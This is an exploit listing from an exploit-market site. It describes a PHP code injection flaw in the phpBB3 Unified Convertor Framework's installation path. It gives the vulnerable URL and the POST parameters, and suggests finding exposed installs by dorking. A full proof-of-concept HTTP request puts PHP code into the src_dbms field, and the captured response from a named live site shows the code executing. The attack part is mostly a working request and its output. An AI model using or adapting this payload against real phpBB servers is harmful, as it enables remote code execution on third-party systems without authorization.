[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpBB3 Unified Convertor Framework PHP Code Injection

Author
Smash_
Risk
[
Security Risk High
]
0day-ID
0day-ID-21655
Category
web applications
Date add
12-12-2013
Platform
php
#Title: phpBB3 Unified Convertor Framework PHP Code Injection
#Date: 12.12.13
#Contact: smash@devilteam.pl

---------------------------------------------------------------

PhpBB3 Unified Convertor Framework suffers from a PHP Code Injection
in installation path. By default it should be disabled but you can
find open installation path's by dorking it or seeking for dir's.

Example:
path/index.php?language=pl&mode=convert&sub=settings&tag=phpbb20
www.phpbb-forum.com/install/index.php?language=pl&mode=convert&sub=settings&tag=phpbb20

POST Data:
forum_path=../forums&refresh=1&src_dbhost=mysql.phpbb-forum.com&src_dbms=[PHP Injection]&src_dbname=db_name&
src_dbpasswd=random&src_dbport=3306&src_dbuser=random&src_table_prefix_phpbb_&submit=Start

---------------------------------------------------------------

PoC:

Request:

POST /2/index.php?language=pl&mode=convert&sub=settings&tag=phpbb20 HTTP/1.1
Host: www.black-hawk.pl
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: phpbb3_mhrwf_u=1; phpbb3_mhrwf_k=; phpbb3_mhrwf_sid=55ca2a95fa6df59c4e401181be06f96f; __utma=25232750.891580291.1386842589.1386842589.1386842589.1; __utmb=25232750; __utmc=25232750; __utmz=25232750.1386842589.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); style_cookie=null; BE=7e4c6af4bfbb176d43a3e0b3150e66d8e9f8308cba84c1f736838085d05766cb3e943a96552aef7756f57c115fd640f99f54cd581ff1b4ab83b32f8773484f88538108245
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 223

forum_path=..%2fforums&refresh=1&src_dbhost=mysql.cba.pl&src_dbms=${@print(666)}\&src_dbname=black_hawk_pl&src_dbpasswd=random&src_dbport=3306&src_dbuser=black_hawk&src_table_prefix_phpbb_&submit=Rozpocznij%20konwersj%c4%99

Response:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 Dec 2013 10:48:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Content-Length: 8741

<br />
<b>Warning</b>:  Unexpected character in input:  ''' (ASCII=39) state=1 in <b>/virtual/black-hawk.pl/2/index.php(752) : eval()'d code</b> on line <b>1</b><br />
<br />
<b>Warning</b>:  Unexpected character in input:  '\' (ASCII=92) state=1 in <b>/virtual/black-hawk.pl/2/index.php(752) : eval()'d code</b> on line <b>1</b><br />
<br />
<b>Warning</b>:  Unexpected character in input:  ''' (ASCII=39) state=1 in <b>/virtual/black-hawk.pl/2/index.php(752) : eval()'d code</b> on line <b>1</b><br />
666<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="pl" xml:lang="pl">
<head>
(...)

...as you can see it works - 666 got printed.

#  0day.today [2024-12-24]  #